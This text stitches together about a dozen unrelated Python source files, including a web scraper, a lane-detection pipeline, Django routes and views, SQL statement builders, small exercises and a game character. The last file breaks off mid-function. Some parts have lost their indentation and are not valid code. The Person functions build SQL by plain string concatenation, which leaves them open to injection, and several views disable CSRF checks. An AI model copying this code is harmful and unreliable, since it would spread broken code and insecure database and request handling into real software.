Class responsible for parsing the desired site
"""
from bs4 import BeautifulSoup
import requests
from urlparse import urlsplit
import utilities
class BookParser(object):
    """Scrape a table-of-contents page and collect chapter links.

    Python 2 code: uses `urlparse` and print statements.
    """
    def __init__(self, url, selector, tag_name):
        self.url = url
        # ('id'|'class'|other, value) tuple produced by utilities.class_or_id
        self.selector = utilities.class_or_id(selector)
        self.tag_name = tag_name
        self.soup = self.get_soup()
    def get_soup(self):
        """
        Retrieve HTML soup from given URL
        """
        # NOTE(review): BeautifulSoup(data) without an explicit parser picks the
        # "best available" one, which can differ per machine and emits a
        # warning; consider BeautifulSoup(data, 'html.parser').
        r = requests.get(self.url)
        data = r.text
        soup = BeautifulSoup(data)
        return soup
    def get_links(self):
        """
        Get 'table of contents page' and retrieve list of pages to send to Readability.com
        """
        url_list = []
        # choose selector
        if self.selector[0] == 'id':
            divs = self.soup.find_all(id=self.selector[1])
        elif self.selector[0] == 'class':
            divs = self.soup.find_all(class_=self.selector[1], limit=1)
        else:
            divs = self.soup.find_all('body', limit=1)
        # then retrieve all links:
        for div in divs:
            for link in div.find_all('a'):
                href = str(link.get('href'))
                # ignore empty links, anchors, and mailto:
                if href != '' and href[0] != '#' and 'None' not in href and 'mailto:' not in href:
                    href = self.sanitize_url(link.get('href'))
                    url_list.append(href)
        print 'Found %s links (Selector: %s).' % (len(url_list), self.selector)
        without_duplicates = utilities.remove_duplicate_urls(url_list)
        print 'Removing duplicates, the list was reduced to %s links.' % len(without_duplicates)
        return without_duplicates
    def sanitize_url(self, current_url):
        """
        Here we have to account for internal links, so if there's no netloc,
        prepend the current (given) URL
        SplitResult(scheme='http', netloc='', path=u'abc.html', query='', fragment=u'')
        """
        # TODO extend this to https and make it more error tolerant
        # absolute urls, starting with / should be handled too
        current_url_parts = urlsplit(current_url)
        if 'http' in current_url:
            sanitized_url = 'http://' + current_url_parts.netloc + current_url_parts.path
        else:
            url_parts = urlsplit(self.url)
            sanitized_url = 'http://' + url_parts.netloc + url_parts.path + current_url_parts.path
        return sanitized_url
    def get_tag_name(self):
        """
        If a name was specified in the command line options, use it as the tag name
        for Readability. Otherwise, default back to the html <title> of the defined page
        """
        if self.tag_name == "":
            return str(self.soup.head.title.contents[0])
        else:
            return self.tag_name
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import pickle
import scipy
from scipy import signal
from collections import deque
def loadDistMatrix():
    """Load the camera matrix and distortion coefficients from the calibration pickle."""
    with open('camera_dist_pickle.p', mode='rb') as f:
        calibration = pickle.load(f)
    return calibration["mtx"], calibration["dist"]
def region_of_interest(img):
    """
    Applies an image mask.
    Keeps only the region inside a polygon spanning the full top edge and
    narrowing to [1/7, 6/7] of the width at the bottom; the rest is set to black.
    """
    h, w = img.shape[0], img.shape[1]
    vertices = np.array([[(0, 0), (w, 0), (w, 0), (6 * w / 7, h),
                          (w / 7, h), (0, 0)]], dtype=np.int32)
    mask = np.zeros_like(img)
    # fill color must match the channel count of the input image
    if len(img.shape) > 2:
        fill_color = (255,) * img.shape[2]
    else:
        fill_color = 255
    cv2.fillPoly(mask, vertices, fill_color)
    # keep the image only where the mask is nonzero
    return cv2.bitwise_and(img, mask)
def undistort(img, mtx, dist):
    """Apply camera-matrix/distortion correction to img via OpenCV."""
    return cv2.undistort(img, mtx, dist, None, mtx)
def binarize(img, s_thresh=(120, 255), sx_thresh=(20, 255), l_thresh=(40, 255)):
    """Threshold an RGB image into lane-candidate pixels.

    Combines an x-gradient (Sobel) threshold on the HLS lightness channel with
    saturation and lightness band thresholds.

    Returns
    -------
    binary : 3-channel uint8 mask (0/255): (lightness AND saturation) OR gradient
    channels : 3-channel uint8 debug image stacking (lightness, gradient, saturation)

    Fix: `.astype(np.float)` relied on the `np.float` alias, deprecated in
    NumPy 1.20 and removed in 1.24; np.float64 is the identical concrete dtype.
    """
    img = np.copy(img)
    # Convert RGB to HLS color space
    hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float64)
    l_channel = hls[:, :, 1]
    s_channel = hls[:, :, 2]
    # x-derivative of lightness accentuates lines away from horizontal
    sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0)
    abs_sobelx = np.absolute(sobelx)
    scaled_sobel = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))
    # Threshold x gradient
    sxbinary = np.zeros_like(scaled_sobel)
    sxbinary[(scaled_sobel >= sx_thresh[0]) & (scaled_sobel <= sx_thresh[1])] = 1
    # Threshold saturation channel
    s_binary = np.zeros_like(s_channel)
    s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
    # Threshold lightness
    l_binary = np.zeros_like(l_channel)
    l_binary[(l_channel >= l_thresh[0]) & (l_channel <= l_thresh[1])] = 1
    channels = 255 * np.dstack((l_binary, sxbinary, s_binary)).astype('uint8')
    binary = np.zeros_like(sxbinary)
    binary[((l_binary == 1) & (s_binary == 1) | (sxbinary == 1))] = 1
    binary = 255 * np.dstack((binary, binary, binary)).astype('uint8')
    return binary, channels
def warp(img, tobird=True):
    """Perspective-warp img to (tobird=True) or back from a bird's-eye view.

    Returns (warped_image, transform_matrix).
    """
    corners = np.float32([[190, 720], [589, 457], [698, 457], [1145, 720]])
    new_top_left = np.array([corners[0, 0], 0])
    new_top_right = np.array([corners[3, 0], 0])
    offset = [150, 0]
    img_size = (img.shape[1], img.shape[0])
    src = np.float32([corners[0], corners[1], corners[2], corners[3]])
    dst = np.float32([corners[0] + offset, new_top_left + offset,
                      new_top_right - offset, corners[3] - offset])
    M = cv2.getPerspectiveTransform(src, dst) if tobird else cv2.getPerspectiveTransform(dst, src)
    warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
    return warped, M
def find_peaks(img, thresh):
    """Find lane-base candidate columns in the bottom half of a binary image.

    Sums channel 0 of the bottom half column-wise, smooths the histogram with a
    Gaussian (sigma=20), and returns (peaks, filtered): the peak column indices
    whose smoothed response exceeds `thresh`, plus the smoothed histogram.

    Fix: `scipy.ndimage.filters` is a deprecated namespace (removed in recent
    SciPy), and the file's `from scipy import signal` never imported
    scipy.ndimage anyway — import gaussian_filter1d explicitly. The unused
    local `xs` was dropped.
    """
    from scipy.ndimage import gaussian_filter1d
    img_half = img[int(img.shape[0] / 2):, :, 0]
    data = np.sum(img_half, axis=0)
    filtered = gaussian_filter1d(data, 20)
    peak_ind = signal.find_peaks_cwt(filtered, np.arange(20, 300))
    peaks = np.array(peak_ind)
    peaks = peaks[filtered[peak_ind] > thresh]
    return peaks, filtered
def get_next_window(img, center_point, width):
    """Mask img to a vertical search window centered at center_point.

    input: img, center_point, width
        img: binary 3 channel image
        center_point: desired horizontal center of the window (clamped so the
            window lies fully inside the image)
        width: window width in pixels
    output: masked, center
        masked: img with everything outside the window zeroed
        center: column of the strongest column-sum inside the window, or the
            (clamped) input center when no column exceeds the signal threshold

    Fix: the original tested `max(hist > 10000)` — max of a boolean array —
    which is an obscure spelling of "any column sum exceeds 10000";
    `hist.max() > 10000` states the same condition directly.
    """
    ny, nx, _ = img.shape
    # clamp the center so the window does not leave the image
    if (center_point <= width / 2):
        center_point = width / 2
    if (center_point >= nx - width / 2):
        center_point = nx - width / 2
    left = center_point - width / 2
    right = center_point + width / 2
    mask = np.zeros_like(img)
    vertices = np.array([[(left, 0), (left, ny), (right, ny), (right, 0)]], dtype=np.int32)
    cv2.fillPoly(mask, vertices, (255, 255, 255))
    masked = cv2.bitwise_and(mask, img)
    hist = np.sum(masked[:, :, 0], axis=0)
    if hist.max() > 10000:
        center = np.argmax(hist)
    else:
        center = center_point
    return masked, center
def lane_from_window(binary, center_point, width):
    """Stack six vertical search-window slices (scanned bottom-up) into a full-height lane mask."""
    n_zones = 6
    ny, nx, nc = binary.shape
    slices = binary.reshape(n_zones, -1, nx, nc)[::-1]  # bottom slice first
    window, center = get_next_window(slices[0], center_point, width)
    for current_slice in slices[1:]:
        next_window, center = get_next_window(current_slice, center, width)
        window = np.vstack((next_window, window))
    return window
# Define a class to receive the characteristics of each line detection
class Line:
    def __init__(self,n=5):
        """Ring-buffered state for one detected lane line (keeps the last n fits)."""
        # length of queue to store data
        self.n = n
        #number of fits in buffer
        self.n_buffered = 0
        # was the line detected in the last iteration?
        self.detected = False
        # x values of the last n fits of the line
        self.recent_xfitted = deque([],maxlen=n)
        #average x values of the fitted line over the last n iterations
        self.avgx = None
        # fit coeffs of the last n fits
        self.recent_fit_coeffs = deque([],maxlen=n)
        #polynomial coefficients averaged over the last n iterations
        self.avg_fit_coeffs = None
        # xvals of the most recent fit
        self.current_fit_xvals = [np.array([False])]
        #polynomial coefficients for the most recent fit
        self.current_fit_coeffs = [np.array([False])]
        #x values for detected line pixels
        self.allx = None
        #y values for detected line pixels
        self.ally = None
        #y values for line fit
        self.fit_yvals = np.linspace(0, 100, num=101)*7.2 # always the same y-range as image
        #radius of curvature of the line in some units
        self.radius_of_curvature = None
        # origin (pixels) of fitted line at the bottom of the image
        self.line_pos = None
        #distance in meters of vehicle center from the line
        self.line_base_pos = None
        #difference in fit coefficients between last and new fits
        self.diffs = np.array([0,0,0], dtype='float')
def set_current_fit_xvals(self):
yvals = self.fit_yvals
self.current_fit_xvals = self.current_fit_coeffs[0]*yvals**2 + self.current_fit_coeffs[1]*yvals + self.current_fit_coeffs[2]
def add_data(self):
self.recent_xfitted.appendleft(self.current_fit_xvals)
self.recent_fit_coeffs.appendleft(self.current_fit_coeffs)
assert len(self.recent_xfitted)==len(self.recent_fit_coeffs)
self.n_buffered = len(self.recent_xfitted)
def pop_data(self):
if self.n_buffered>0:
self.recent_xfitted.pop()
self.recent_fit_coeffs.pop()
assert len(self.recent_xfitted)==len(self.recent_fit_coeffs)
self.n_buffered = len(self.recent_xfitted)
return self.n_buffered
def set_avgx(self):
fits = self.recent_xfitted
if len(fits)>0:
avg=0
for fit in fits:
avg +=np.array(fit)
avg = avg / len(fits)
self.avgx = avg
def set_avgcoeffs(self):
coeffs = self.recent_fit_coeffs
if len(coeffs)>0:
avg=0
for coeff in coeffs:
avg +=np.array(coeff)
avg = avg / len(coeffs)
self.avg_fit_coeffs = avg
def set_allxy(self,lane_candidate):
self.ally,self.allx = (lane_candidate[:,:,0]>254).nonzero()
def set_current_fit_coeffs(self):
self.current_fit_coeffs = np.polyfit(self.ally, self.allx, 2)
def get_diffs(self):
if self.n_buffered>0:
self.diffs = self.current_fit_coeffs - self.avg_fit_coeffs
else:
self.diffs = np.array([0,0,0], dtype='float')
def set_radius_of_curvature(self):
# Define y-value where we want radius of curvature (choose bottom of the image)
y_eval = max(self.fit_yvals)
if self.avg_fit_coeffs is not None:
self.radius_of_curvature = ((1 + (2*self.avg_fit_coeffs[0]*y_eval + self.avg_fit_coeffs[1])**2)**1.5) \
/np.absolute(2*self.avg_fit_coeffs[0])
def set_line_base_pos(self):
y_eval = max(self.fit_yvals)
self.line_pos = self.current_fit_coeffs[0]*y_eval**2 \
+self.current_fit_coeffs[1]*y_eval \
+ self.current_fit_coeffs[2]
basepos = 640
self.line_base_pos = (self.line_pos - basepos)*3.7/600.0 # 3.7 meters is about 600 pixels in the x direction
# here come sanity checks of the computed metrics
def accept_lane(self):
flag = True
maxdist = 2.8 # distance in meters from the lane
if(abs(self.line_base_pos) > maxdist ):
print('lane too far away')
flag = False
if(self.n_buffered > 0):
relative_delta = self.diffs / self.avg_fit_coeffs
# allow maximally this percentage of variation in the fit coefficients from frame to frame
if not (abs(relative_delta)<np.array([0.7,0.5,0.15])).all():
print('fit coeffs too far off [%]',relative_delta)
flag=False
return flag
def update(self,lane):
self.set_allxy(lane)
self.set_current_fit_coeffs()
self.set_current_fit_xvals()
self.set_radius_of_curvature()
self.set_line_base_pos()
self.get_diffs()
if self.accept_lane():
self.detected=True
self.add_data()
self.set_avgx()
self.set_avgcoeffs()
else:
self.detected=False
self.pop_data()
if self.n_buffered>0:
self.set_avgx()
self.set_avgcoeffs()
return self.detected,self.n_buffered
def get_binary_lane_image(img, line, window_center, width=300):
    """Extract a masked binary image containing one lane line.

    When the line was detected in the previous frame, its last base
    position seeds the search window; otherwise the histogram peak
    closest to the supplied starting center is used.
    """
    if line.detected:
        window_center = line.line_pos
    else:
        peaks, filtered = find_peaks(img, thresh=3000)
        if len(peaks) != 2:
            print('Trouble ahead! '+ str(len(peaks)) +' lanes detected!')
            plt.imsave('troublesome_image.jpg', img)
        # Pick the peak nearest to where we expected the lane to be.
        nearest = np.argmin(abs(peaks - window_center))
        window_center = peaks[nearest]
    return lane_from_window(img, window_center, width)
def project_lane_lines(img, mtx, dist, left_fitx, right_fitx, yvals):
    """Paint the detected lane area back onto the undistorted camera image."""
    # Blank canvas in warped (top-down) space to draw the lane polygon on.
    overlay = np.zeros_like(img).astype(np.uint8)
    # Stitch left and right fits into one closed polygon (right side reversed).
    left_pts = np.array([np.transpose(np.vstack([left_fitx, yvals]))])
    right_pts = np.array([np.flipud(np.transpose(np.vstack([right_fitx, yvals])))])
    polygon = np.hstack((left_pts, right_pts))
    cv2.fillPoly(overlay, np.int_([polygon]), (0,255, 0))
    undist = undistort(img, mtx, dist)
    # Only the inverse perspective matrix is needed here.
    _, Minv = warp(img, tobird=False)
    # Map the drawn polygon from top-down view back into camera view.
    unwarped_overlay = cv2.warpPerspective(overlay, Minv, (img.shape[1], img.shape[0]))
    # Blend the lane overlay onto the undistorted frame.
    return cv2.addWeighted(undist, 1, unwarped_overlay, 0.3, 0)
def process_image(img, mtx, dist, left, right):
    """Full per-frame pipeline: undistort, binarize, warp, track both lane
    lines, and annotate the frame with off-center distance and curvature."""
    undist = undistort(img, mtx, dist)
    binary, _ = binarize(undist)
    warped, _ = warp(binary)
    warped_binary = region_of_interest(warped)
    # Seed each search window at the previous base position when available,
    # else at fixed default columns (340 left, 940 right).
    window_center_l = left.line_pos if left.detected else 340
    left_binary = get_binary_lane_image(warped_binary, left, window_center_l, width=300)
    window_center_r = right.line_pos if right.detected else 940
    right_binary = get_binary_lane_image(warped_binary, right, window_center_r, width=300)
    left.update(left_binary)
    right.update(right_binary)
    yvals = left.fit_yvals
    lane_width = 3.7
    # Offset of the vehicle from lane center, in centimeters.
    off_center = -100*round(0.5*(right.line_base_pos-lane_width/2) + 0.5*(abs(left.line_base_pos)-lane_width/2),2)
    result = project_lane_lines(img, mtx, dist, left.avgx, right.avgx, yvals)
    font = cv2.FONT_HERSHEY_SIMPLEX
    label = str('distance from center: '+str(off_center)+'cm')
    cv2.putText(result, label, (430,630), font, 1, (0,0,255), 2, cv2.LINE_AA)
    if left.radius_of_curvature and right.radius_of_curvature:
        curvature = 0.5*(round(right.radius_of_curvature/1000,1) + round(left.radius_of_curvature/1000,1))
        cv2.putText(result, str('radius of curvature: '+str(curvature)+'km'), (430,670), font, 1, (0,0,255), 2, cv2.LINE_AA)
    return result
def warp_pipeline(img, mtx, dist):
    """Undistort, perspective-warp, then crop to the region of interest."""
    warped, _ = warp(undistort(img, mtx, dist))
    return region_of_interest(warped)
def warp_binarize_pipeline(img, mtx, dist):
    """Undistort, threshold to binary, warp, then crop to the region of interest."""
    binary, _ = binarize(undistort(img, mtx, dist))
    warped, _ = warp(binary)
    return region_of_interest(warped)
|
from django.contrib import admin
from django.urls import path, re_path
from leads import views
from django.conf.urls import url

# URL routes for the leads API and the admin site.
urlpatterns = [
    path('admin/', admin.site.urls),
    re_path(r'^api/leads/$', views.leads_list),
    # Capture the full primary key: the original pattern `([0-9])` matched
    # only a single digit, so leads with ids >= 10 returned 404.
    re_path(r'^api/leads/([0-9]+)$', views.leads_detail),
]
|
class Buffer:
    """Accumulates a stream of integers; every time five elements have been
    buffered, prints the sum of that chunk of five and discards it."""

    def __init__(self):
        # Elements received so far that have not yet formed a full chunk.
        self.current_part = []

    def add(self, *a):
        """Append the next part of the sequence, flushing complete chunks."""
        self.current_part.extend(a)
        while len(self.current_part) >= 5:
            # Report the sum of the oldest five elements...
            print(sum(self.current_part[:5]))
            # ...and keep only the remainder.
            self.current_part = self.current_part[5:]

    def get_current_part(self):
        """Return the buffered elements in insertion order."""
        return self.current_part
# Demo: feed the buffer in chunks and show what remains buffered after each.
buf = Buffer()
for chunk in ((1, 2, 3), (4, 5, 6), (7, 8, 9, 10), (1,) * 11):
    buf.add(*chunk)
    print(buf.get_current_part())
|
from tornado import gen
from tornado.ioloop import IOLoop
from bokeh.server.server import Server
from bokeh.application.handlers import FunctionHandler
from bokeh.application import Application
import numpy as np
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource
import fire
class BokehScope(object):
    """Serves an interactive Bokeh line plot of a set of waveform curves,
    re-downsampling the data whenever the visible x-range changes."""

    def __init__(self, curves, active):
        self.io_loop = IOLoop.current()
        self.bokeh_app = Application(FunctionHandler(self.modify_doc))
        self.server = Server({'/': self.bokeh_app}, io_loop=self.io_loop)
        self.colors = ['blue', 'red', 'green', 'magenta']
        self.curves = curves
        self.active = active
        self.source = ColumnDataSource(data=self.curves.downsample())
        # Guards against queueing more than one pending update at a time.
        self.busy = False
        self.skip_update = False

    def plot(self):
        """Start the Bokeh server, open the page, and block on the IO loop."""
        print('Opening Bokeh application on http://localhost:5006/')
        self.server.start()
        self.io_loop.add_callback(self.server.show, "/")
        self.io_loop.start()

    def modify_doc(self, doc):
        """Build the document: one line per active curve plus a zoom callback
        that re-downsamples to the currently visible time window."""
        fig = figure(plot_width=1400, title="Waveforms",
                     tools="xpan,xwheel_zoom,xbox_zoom,undo, redo, reset")
        for idx, curve_name in enumerate(self.active):
            fig.line(x='t', y=curve_name, color=self.colors[idx], source=self.source)
        doc.add_root(fig)

        @gen.coroutine
        def update():
            # Refresh the data source for the visible x-range only.
            self.source.data = self.curves.downsample(
                tlim=[fig.x_range.start, fig.x_range.end])
            self.busy = False

        def change_callback(attr, old, new):
            # Coalesce rapid range changes into a single queued update.
            if not self.busy:
                self.busy = True
                doc.add_next_tick_callback(update)

        fig.x_range.on_change('end', change_callback)
def plot(folder, names, to_plot):
    """CLI entry point: load waveform curves and serve them in a BokehScope.

    folder  -- directory containing the waveform data
    names   -- curve names to load
    to_plot -- subset of curve names to actually draw
    """
    from . import parse
    c = parse.CurveSet(folder, names)
    try:
        app = BokehScope(c, to_plot)
        app.plot()
    except KeyboardInterrupt:
        # Ctrl-C stops the server cleanly. The original called exit() and
        # then fell through to an unreachable `pass`; raise SystemExit
        # directly and drop the dead code.
        raise SystemExit
if __name__ == "__main__":
fire.Fire(plot) |
import PeruDB
import PeruConstants, CommonFunctions
def PersonInsertFromList(people):
    """Build a batch of INSERT statements, one per person in *people*.

    Returns the concatenated SQL string, or the error value produced by
    PersonInsertStatement for the first invalid person.
    """
    resultString = ""
    for person in people:
        result = PersonInsertStatement(person)
        # PersonInsertStatement signals a bad record by returning a
        # [code, message] list — never -1, which the old check tested for,
        # so the error path crashed on the string concatenation below.
        # Propagate the error value to the caller instead.
        if not isinstance(result, str):
            return result
        resultString += result
    return resultString
def PersonReadSingleStatement(PersonID):
    """Return a SELECT statement fetching the person with the given id."""
    # NOTE(review): SQL built by concatenation — not injection-safe for
    # untrusted PersonID values.
    query = "SELECT * FROM PERSON WHERE " + PeruConstants.PERSON_ID + " = '" + str(PersonID) + "';\n"
    return query
def PersonInsertStatement(fields):
    """Return an INSERT statement for one person record.

    *fields* may hold every PERSON column, or every column except the id
    (assumed auto-generated). Returns [1, "Improper format"] when the
    field count matches neither shape.
    NOTE(review): values are spliced in by string concatenation — not
    injection-safe for untrusted input.
    """
    expected = len(PeruConstants.PERSON_FIELDS)
    if not (expected - 1 <= len(fields) <= expected):
        return [1,"Improper format"]
    columns = ",".join(PeruConstants.PERSON_FIELDS[1:])
    if len(fields) == expected - 1:
        # Id omitted: every supplied value maps onto the non-id columns.
        return ("INSERT INTO " + PeruConstants.PERSON +
                "(" + columns + ")" +
                " VALUES('" + "','".join(fields) + "');\n")
    # Full record: skip the supplied id value. (This branch historically
    # emits a space before the column list; kept for byte-compatibility.)
    return ("INSERT INTO " + PeruConstants.PERSON + " (" + columns + ")" +
            " VALUES('" + "','".join(fields[1:]) + "');\n")
def PersonUpdateStatement(fields):
    """Return an UPDATE statement for a full person record, or -1 when the
    field count does not match the PERSON schema."""
    if len(fields) != len(PeruConstants.PERSON_FIELDS):
        return -1
    # One "col = 'value'" assignment per non-id column.
    assignments = ",".join(
        PeruConstants.PERSON_FIELDS[i] + " = '" + fields[i] + "'"
        for i in range(1, len(fields))
    )
    return ("UPDATE PERSON" +
            " SET " + assignments +
            " WHERE " + PeruConstants.PERSON_FIELDS[0] + " = " + fields[0] + ";\n")
def PersonDeleteStatement(PersonID):
    """Return a DELETE statement removing the person with the given id."""
    return "DELETE FROM PERSON WHERE " + PeruConstants.PERSON_FIELDS[0] + " = '" + str(PersonID) + "';\n"
def ReadPerson(PersonID):
    """Open a database connection, fetch one person row, and close it."""
    database = PeruDB.PeruDB()
    # NOTE(review): `querry` is the project's (misspelled) API name.
    output = database.querry(PersonReadSingleStatement(PersonID))
    database.closeDB()
    return output
def InsertUpdatePerson(database, fields):
    """Upsert: update when an id is present in fields[0], insert otherwise."""
    fields = CommonFunctions.FormatFields(fields)
    if fields[0] == '':
        return InsertPerson(database, fields)
    return UpdatePerson(database, fields)
def InsertPerson(database, fields):
    """Execute an INSERT for *fields* and return the driver's result."""
    return database.insert(PersonInsertStatement(fields))
def UpdatePerson(database, fields):
    """Execute an UPDATE; on success (code 0) return [0, updated_id]."""
    output = database.update(PersonUpdateStatement(fields))
    if output[0] == 0:
        output = [0, fields[0]]
    return output
def DeletePerson(database, PersonID):
    """Execute a DELETE for the given person id and return the result."""
    return database.delete(PersonDeleteStatement(PersonID))
import sajilo
import sys
import os.path
if len(sys.argv) == 1:
    # No input file given: show usage instead of prompting.
    print("Usage: %s filename" % __file__)
else:
    # Compare the extension case-insensitively so FILE.SAJILO also works
    # (the original check rejected anything but lowercase ".sajilo").
    ext = str(os.path.splitext(sys.argv[1])[1]).lower()
    if ext == ".sajilo":
        # Run the program through the sajilo interpreter.
        with open(sys.argv[1]) as f:
            sajilo.execute(f.read())
    else:
        print("Sajilo Compiler only supports .sajilo files!")
|
# Exercise statement (kept verbatim) followed by team data setup.
# `time` is Portuguese for "team"; `jogador` is the per-player record.
print('''Aprimore o Desafio 093 para que funcione com varios jogadores,
incluindo um sistema de visualização de detalhes do aproveitamento de
cada jogador.
''')
jogador = {}
time = []
print(f'{" Gerenciamento de Aproveitamento ":=^50}')
# Capture one player per iteration until the user answers 'N'.
while True:
    jogador['Nome'] = input('Nome: ')
    jogador['Partidas'] = int(input('Quantidade de partidas: '))
    jogador['Gols'] = list()
    for p in range(1, jogador['Partidas']+1):
        jogador['Gols'].append(int(input(f'Quantidade de gols na {p}º partida: ')))
    jogador['Gols totais'] = sum(jogador['Gols'])
    time.append(jogador.copy())
    # Re-ask until a valid answer. The original indexed [0] on the raw
    # input, which raised IndexError on an empty line (and '' is a
    # substring of 'SsNn', so the old loop condition also exited on it).
    keep = ''
    while keep not in ('S', 'N'):
        keep = input('Deseja continuar? [S/N] ').strip().upper()[:1]
    if keep == 'N':
        break
# Print the team table: one header row plus one row per player.
print('{:=^50}'.format('Dados do Time'))
header_cols = ('Codigo', 'Nome', 'Partidas', 'Gols', 'Gols Totais')
print(''.join('{: ^15}'.format(col) for col in header_cols))
for contador, p in enumerate(time, 1):
    row = (contador, p['Nome'], p['Partidas'], str(p['Gols']), p['Gols totais'])
    print(''.join('{: ^15}'.format(cell) for cell in row))
# Per-player detail view: keeps asking until the user enters 999.
while True:
    select = int(input('Mostrar dados.txt de qual jogador? (999 para parar)'))
    if select == 999:
        break
    # Reject out-of-range codes. The original only checked the upper bound,
    # so 0 and negative values silently indexed from the end of the list,
    # and 999 was ignored inside the retry loop.
    if not 1 <= select <= len(time):
        continue
    jog = time[select-1]
    print('{:=^50}'.format(f'Levantamento do jogador {jog["Nome"]} '))
    print(f'O jogador {jog["Nome"]} jogou {jog["Partidas"]} jogos e fez {str(jog["Gols totais"])} gols no total.')
    for contador in range(0, len(jog["Gols"])):
        print(f'No {contador+1}º jogo fez {jog["Gols"][contador]} gols')
import eng
class Yamazaki:
    """NPC: a Japanese businessman who hands over his business card the
    second time the player talks to him."""
    name = 'Yamazaki'
    visible = True
    aliases = ['yamazaki', 'Mr. Yamazaki', 'Genzo Yamazaki', 'Japanese businessman']
    # Fixed two typos in the displayed text: "an Japanese" -> "a Japanese",
    # and a stray closing double-quote at the end of the intro line.
    descriptions = {'desc': "You see a Japanese businessman dressed in formal attire. ",
                    'intro': 'Hajimemashite, I am Genzo Yamazaki. I am COO at Matsui Corp.',
                    'converse': "YOU: I am ... I work at the Old Money Corporation in Finance. Yamazaki: Nice to meet you. Here is my business card. ",
                    'shock': "Please sir do not touch me, it is not appropriate as business partners. "}
    # 'conversation' flips to True after the first talk().
    properties = {'conversation': False}

    def look(self):
        """Mark the character visible and return his description."""
        self.visible = True
        return self.descriptions['desc']

    def talk(self):
        """First call: introduction. Later calls: conversation that also
        reveals the business card and adds it to the inventory once."""
        if self.properties['conversation']:
            currRoom = eng.getCurrentRoom()
            meishi = eng.getItemByName('business card')
            if meishi is not None:
                meishi.visible = True
                if meishi.properties['have'] == False:
                    meishi.properties['have'] = True
                    eng.addToInventory(meishi)
            return self.descriptions['converse']
        else:
            self.properties['conversation'] = True
            return self.descriptions['intro']

    def touch(self):
        """Reaction to being touched."""
        return self.descriptions['shock']
# Instantiate the NPC and register it with the game engine.
yamazaki = Yamazaki()
eng.setupItem(yamazaki)
|
# Dictionary of test scores keyed by student name.
scores = {
    "山田" : 90,
    "高橋" : 100,
    "山本" : 70,
    "田中" : 85,
    "坂本" : 55
}
# Sum all scores in one pass instead of a manual accumulator loop.
total = sum(scores.values())
ave = total / len(scores)
# First report: total and average (labels kept in Japanese).
print("合計:" + str(total) + "点")
print("平均:" + str(ave) + "点")
# Add a new student and fold the new score into the running total.
scores["中田"] = 95
total += scores["中田"]
ave = total / len(scores)
# Second report, after the addition.
print("合計:" + str(total) + "点")
print("平均:" + str(ave) + "点")
|
# coding=utf-8
import json
from decimal import Decimal
import sys
from django.core import serializers
from datetime import datetime
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from laboratorio import views_nivel_insumos
from laboratorio.modelos_vista import Convertidor, ProductoVista
from laboratorio.models import Producto, Tipo, Usuario, OrdenPedido, Bodega, DetalleOrden, ProductoReposicionPendiente
"""
SA-LCINV-16: Método para navegar hacia el modal
que permite guardar el detalle de la orden de reposición.
"""
def ir_modal_or(request):
    """SA-LCINV-16: render the modal used to save a replenishment order's detail."""
    return render(request, "laboratorio/modal_orden_reposicion.html")
"""
SA-LCINV-16: Método que crea la orden automática de
reposición como una orden de pedido, se recibe el id
del producto o se obtiene de la sesión proveniente
de un ejecución previa de transacción.
"""
@csrf_exempt
def crearOrdenPedido(request):
    """SA-LCINV-16: create the automatic replenishment order as an
    OrdenPedido.

    The product id comes from the GET querystring or, failing that, from
    the session (left there by a previous transaction). The created
    order's id is stored in the session for the follow-up views.
    """
    if request.method == 'GET' and 'id' in request.GET:
        id = request.GET['id']
        orden_pedido = crearOrden(id=id)
        request.session['producto_id'] = id
        request.session['orden_pedido_id'] = orden_pedido.id
        mensaje = "ok"
    else:
        pk_producto = request.session.get('producto_id', None)
        # Debug trace. The original used the Python-2-only `print >>`
        # statement (a SyntaxError on Python 3); an explicit write keeps
        # identical output on both interpreter lines.
        sys.stdout.write('ID PRODUCTO crear' + str(request.session.get('producto_id', None)) + '\n')
        orden_pedido = crearOrden(id=pk_producto)
        mensaje = "ok"
        request.session['orden_pedido_id'] = orden_pedido.id
    return JsonResponse({'mensaje':mensaje})
"""
SA-LCINV-16: Método que obtiene la información de un producto
cuyo id se encuentra guardado en la sesión actual.
"""
@csrf_exempt
def obtenerInfoProducto(request):
    """SA-LCINV-16: return the serialized product stored in the session,
    together with the pending order id."""
    pk_producto = request.session.get('producto_id', None)
    pk_orden = request.session.get('orden_pedido_id', None)
    # Debug trace; replaces the Python-2-only `print >>` statement, which
    # is a SyntaxError on Python 3.
    sys.stdout.write('ID PRODUCTO info' + str(request.session.get('producto_id', None)) + ' ' + str(pk_orden) + '\n')
    if pk_producto != None and pk_orden != None:
        producto = Producto.objects.get(id=pk_producto)
        prod_json = json.loads(serializers.serialize('json', [producto]))
        return JsonResponse({'producto':prod_json, 'pk_orden':pk_orden}, safe=False)
    # The original fell through and returned None (which Django turns into
    # a 500); answer with an explicit empty payload instead.
    return JsonResponse({'producto': None, 'pk_orden': None}, safe=False)
"""
SA-LCINV-16: Método que guarda el detalle de una orden
de reposición, se encarga tambien de cambiar el estado
de guardado de detalle para la orden pendiente.
"""
@csrf_exempt
def guardarDetalleOrdenReposicion(request):
    """SA-LCINV-16: save one DetalleOrden row for the session's pending
    replenishment order and flag the pending-product record as saved."""
    mensaje = ""
    if request.method == "POST":
        pk_producto = request.POST.get('producto', None)
        # Debug trace; replaces the Python-2-only `print >>` statement,
        # which is a SyntaxError on Python 3.
        sys.stdout.write(str(pk_producto) + '\n')
        pk_orden = request.session.get('orden_pedido_id', None)
        fecha_movimiento = request.POST.get('fecha_movimiento', None)
        cantidad = request.POST.get('cantidad', None)
        if pk_producto != None and pk_orden != None and fecha_movimiento != None and cantidad != None:
            producto = Producto.objects.get(id=pk_producto)
            orden = OrdenPedido.objects.get(id=pk_orden)
            # '%c' mirrors the strftime('%c') format emitted by
            # fechaPeticionOrdenReposicion.
            fecha = datetime.strptime(fecha_movimiento, '%c')
            cant = Decimal(cantidad)
            detalle = DetalleOrden()
            detalle.fecha_movimiento = fecha
            detalle.producto = producto
            detalle.cantidad = cant
